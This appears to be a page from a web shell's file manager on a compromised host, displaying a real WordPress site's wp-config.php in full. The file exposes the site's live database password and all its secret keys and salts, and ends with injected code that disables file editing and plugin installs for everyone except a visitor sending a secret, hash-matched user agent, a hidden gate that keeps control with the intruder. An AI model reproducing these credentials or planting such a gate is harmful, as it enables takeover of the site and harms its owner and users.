PHP 8.2.29
Preview: wp-config.php Size: 3.64 KB
/home/medyaist/Secure/vetplusveteriner.com/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'medyaist_wp228' );

/** Database username */
define( 'DB_USER', 'medyaist_wp228' );

/** Database password */
define( 'DB_PASSWORD', 'S7pc.]B691' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'tzjla03qasuu7yc3lws4f1nwzcxsyzre3p2uxvxqmxjeoocumiohuwncbeid9qyl' );
define( 'SECURE_AUTH_KEY',  '0unonl4tzykfzud3ylpm2jypv41uiyponkvstsyskwerz59u4iflrcfctqfdwq5u' );
define( 'LOGGED_IN_KEY',    '0cyn9m73h7nvaucjvr2hznuaxas7he2wy8ishik41vlzgt84yipthsg0mryl90rr' );
define( 'NONCE_KEY',        'w64k7yh3uesz6kjxk1f8bn0t7bwsawgsabh0j89mayqtjcc1ffu7gbviprxgpln4' );
define( 'AUTH_SALT',        'o3spa5lhah5kijwlqavunf15iusyuyzgbws7kj0ftovcdequsf6iiv8mqt1gyegn' );
define( 'SECURE_AUTH_SALT', 'hssf6x5trrwrehovfw4e7leovjsl9afv9nsofx06uvsjqrca6xuakvpdlkzyfhw1' );
define( 'LOGGED_IN_SALT',   'sawwlsenbmrbo5fx6jave9ezpsmazqya7qedrepm6dv1lkopacmynthhnivi2uoh' );
define( 'NONCE_SALT',       'slucbz23tabqx9a0eg2du5xcj4ifrzf8ujpzkibf7gomtwgu0gdif2pczcwht1ma' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 *
 * At the installation time, database tables are created with the specified prefix.
 * Changing this value after WordPress is installed will make your site think
 * it has not been installed.
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
 */
$table_prefix = 'wpy3_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



define('CONCATENATE_SCRIPTS', false);

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){
    define('DISALLOW_FILE_MODS', true);
    define('DISALLOW_FILE_EDIT', true);
}

Directory Contents

Dirs: 0 × Files: 1
Name Size Perms Modified Actions
3.64 KB lrw-r--r-- 2025-12-18 22:46:42
Edit Download
If ZipArchive is unavailable, a .tar will be created (no compression).